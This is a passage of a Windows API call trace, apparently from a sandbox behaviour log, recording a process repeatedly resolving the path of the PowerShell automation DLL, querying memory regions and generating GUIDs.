lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.639] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x75b8cadf, Data2=0xc11e, Data3=0x4e3f, Data4=([0]=0xb7, [1]=0x83, [2]=0x42, [3]=0x7, [4]=0xc4, [5]=0x7f, [6]=0x87, [7]=0x42))) returned 0x0 [0135.640] VirtualQuery (in: lpAddress=0xcb170, lpBuffer=0xcc030, dwLength=0x30 | out: lpBuffer=0xcc030*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.640] VirtualQuery (in: lpAddress=0xcb170, lpBuffer=0xcc030, dwLength=0x30 | out: lpBuffer=0xcc030*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.641] VirtualQuery (in: lpAddress=0xcb200, lpBuffer=0xcc0c0, dwLength=0x30 | out: lpBuffer=0xcc0c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.641] VirtualQuery (in: lpAddress=0xcb170, lpBuffer=0xcc030, dwLength=0x30 | out: lpBuffer=0xcc030*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.641] VirtualQuery (in: lpAddress=0xcb200, lpBuffer=0xcc0c0, dwLength=0x30 | out: lpBuffer=0xcc0c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.643] VirtualQuery (in: lpAddress=0xcb170, lpBuffer=0xcc030, dwLength=0x30 | out: lpBuffer=0xcc030*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.643] VirtualQuery (in: lpAddress=0xcb200, lpBuffer=0xcc0c0, dwLength=0x30 | out: lpBuffer=0xcc0c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.643] VirtualQuery (in: lpAddress=0xcb170, lpBuffer=0xcc030, dwLength=0x30 | out: lpBuffer=0xcc030*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.643] VirtualQuery (in: lpAddress=0xcb200, lpBuffer=0xcc0c0, dwLength=0x30 | out: lpBuffer=0xcc0c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.644] VirtualQuery (in: lpAddress=0xcb170, lpBuffer=0xcc030, dwLength=0x30 | out: lpBuffer=0xcc030*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.644] VirtualQuery (in: lpAddress=0xcb200, lpBuffer=0xcc0c0, dwLength=0x30 | out: lpBuffer=0xcc0c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.644] VirtualQuery (in: lpAddress=0xcb170, lpBuffer=0xcc030, dwLength=0x30 | out: lpBuffer=0xcc030*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.644] VirtualQuery (in: lpAddress=0xcb200, lpBuffer=0xcc0c0, dwLength=0x30 | out: lpBuffer=0xcc0c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.644] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.645] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.645] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.645] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.645] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.645] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.646] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.646] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x89b40a73, Data2=0xa12, Data3=0x4e94, Data4=([0]=0xb9, [1]=0xc6, [2]=0xdb, [3]=0xe5, [4]=0x36, [5]=0x53, [6]=0x17, [7]=0x16))) returned 0x0 [0135.646] VirtualQuery (in: lpAddress=0xcba80, lpBuffer=0xcc940, dwLength=0x30 | out: lpBuffer=0xcc940*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.646] VirtualQuery (in: lpAddress=0xcba80, lpBuffer=0xcc940, dwLength=0x30 | out: lpBuffer=0xcc940*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.646] VirtualQuery (in: lpAddress=0xcbb10, lpBuffer=0xcc9d0, dwLength=0x30 | out: lpBuffer=0xcc9d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.646] VirtualQuery (in: lpAddress=0xcba80, lpBuffer=0xcc940, dwLength=0x30 | out: lpBuffer=0xcc940*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.647] VirtualQuery (in: lpAddress=0xcbb10, lpBuffer=0xcc9d0, dwLength=0x30 | out: lpBuffer=0xcc9d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.647] VirtualQuery (in: lpAddress=0xcba80, lpBuffer=0xcc940, dwLength=0x30 | out: lpBuffer=0xcc940*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.647] VirtualQuery (in: lpAddress=0xcbb10, lpBuffer=0xcc9d0, dwLength=0x30 | out: lpBuffer=0xcc9d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.647] VirtualQuery (in: lpAddress=0xcba80, lpBuffer=0xcc940, dwLength=0x30 | out: lpBuffer=0xcc940*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.647] VirtualQuery (in: lpAddress=0xcbb10, lpBuffer=0xcc9d0, dwLength=0x30 | out: lpBuffer=0xcc9d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.648] VirtualQuery (in: lpAddress=0xcba80, lpBuffer=0xcc940, dwLength=0x30 | out: lpBuffer=0xcc940*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.648] VirtualQuery (in: lpAddress=0xcbb10, lpBuffer=0xcc9d0, dwLength=0x30 | out: lpBuffer=0xcc9d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.648] VirtualQuery (in: lpAddress=0xcba80, lpBuffer=0xcc940, dwLength=0x30 | out: lpBuffer=0xcc940*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.648] VirtualQuery (in: lpAddress=0xcbb10, lpBuffer=0xcc9d0, dwLength=0x30 | out: lpBuffer=0xcc9d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.648] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.648] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.649] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.649] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.649] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.649] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.649] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.650] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x47ea6d06, Data2=0x741d, Data3=0x462f, Data4=([0]=0xa0, [1]=0x8f, [2]=0xb6, [3]=0xcf, [4]=0xeb, [5]=0xb5, [6]=0xc1, [7]=0x9c))) returned 0x0 [0135.650] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.650] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.650] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.651] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.651] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.651] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.651] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.651] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.651] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.651] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.652] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.652] VirtualQuery (in: lpAddress=0xcb740, lpBuffer=0xcc600, dwLength=0x30 | out: lpBuffer=0xcc600*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.652] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.652] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.652] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.652] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.653] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x39306952, Data2=0x681, Data3=0x4695, Data4=([0]=0x9b, [1]=0x7f, [2]=0xe3, [3]=0xc5, [4]=0x60, [5]=0x6e, [6]=0x90, [7]=0x4a))) returned 0x0 [0135.653] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x38bc70f4, Data2=0xd3f9, Data3=0x4e9b, Data4=([0]=0x82, [1]=0x2a, [2]=0x33, [3]=0x0, [4]=0xae, [5]=0x18, [6]=0xe7, [7]=0x6f))) returned 0x0 [0135.653] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x133202bb, Data2=0x9d0d, Data3=0x4b34, Data4=([0]=0xb6, [1]=0x2e, [2]=0x21, [3]=0xb, [4]=0xab, [5]=0x34, [6]=0x57, [7]=0x97))) returned 0x0 [0135.653] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xf6c8f465, Data2=0x4f56, Data3=0x4db6, Data4=([0]=0xaa, [1]=0xee, [2]=0xee, [3]=0x7, [4]=0xfd, [5]=0x15, [6]=0x7c, [7]=0x26))) returned 0x0 [0135.654] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xf9a56498, Data2=0x31ae, Data3=0x4cd0, Data4=([0]=0x95, [1]=0x28, [2]=0xce, [3]=0x2d, [4]=0x5e, [5]=0x80, [6]=0xb2, [7]=0xf6))) returned 0x0 [0135.654] VirtualQuery (in: lpAddress=0xcb850, lpBuffer=0xcc710, dwLength=0x30 | out: lpBuffer=0xcc710*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.654] VirtualQuery (in: lpAddress=0xcb8e0, lpBuffer=0xcc7a0, dwLength=0x30 | out: lpBuffer=0xcc7a0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.654] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xb74900d9, Data2=0xffa4, Data3=0x43e5, Data4=([0]=0xb1, [1]=0x59, [2]=0x1e, [3]=0xcb, [4]=0x69, [5]=0x4, [6]=0xdb, [7]=0xae))) returned 0x0 [0135.654] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x6af2127a, Data2=0x91fa, Data3=0x4b60, Data4=([0]=0xb4, [1]=0x5, [2]=0x87, [3]=0x8a, [4]=0x89, [5]=0x4, [6]=0x14, [7]=0x7c))) returned 0x0 [0135.655] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xc8878b19, Data2=0x776f, Data3=0x47d2, Data4=([0]=0x97, [1]=0x13, 